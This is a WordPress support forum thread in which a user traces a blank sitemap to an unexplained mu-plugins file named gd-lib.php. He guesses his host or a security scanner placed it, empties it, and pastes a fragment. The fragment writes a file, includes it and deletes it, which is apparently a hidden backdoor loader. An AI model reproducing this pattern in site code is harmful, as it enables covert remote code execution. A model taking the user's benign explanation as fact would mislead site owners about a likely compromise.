Trying to submit a sitemap in Google webtools and when I test it google returns the error “Your Sitemap does not contain any URLs. Please validate and resubmit your Sitemap.”

Here is the sitemap… https://oilyoga.com/sitemap.xml

it is blank and there is nothing in the source code. Can you help me with this and let me know what I might be doing wrong?

Thanks,

Jimmy

Hi Michael,

 can you tell me what sub- folder you see that file in? I do not see it in the plugins folder.

Thanks,

Jimmy

Thanks Steve I found it.

I think that file is placed there by GoDaddy because this is a managed WordPress hosting. I have this same configuration (managed Wordpress hosting and All in One SEO) on over 90 installs and as far as I can tell this site is the only one that is being affected by the gd-lib.php file.

I removed the file and the site shut down so I had to put it back to get the site back. I’m not 100% sure but I think that file might have been placed there by sucuri.net because of server-side scanning errors we were having with this site.

Here is what I did to get my sitemap back in case anyone else has this problem.

 I took the gd-lib.php and saved a copy of it in a separate folder. I then took the original and deleted all the info in it and added it back to the mu-plugins folder. The site came back up and the Sitemap now works!

I will dig a little deeper and try to figure out who put that file there (GoDaddy or sucuri.net) and why. Meantime I have the sitemap back and I appreciate your help!

Jimmy

Here are the contents of that gd-lib.php in case any of it can tell you why it was blocking the sitemap:

$mtchs[1]
?>”);

fclose($hdl);

include(“{$eb}.$algo);

unlink(“{$eb}.$algo);

$npDcheckClassBgp = ‘aue’;

}

?>
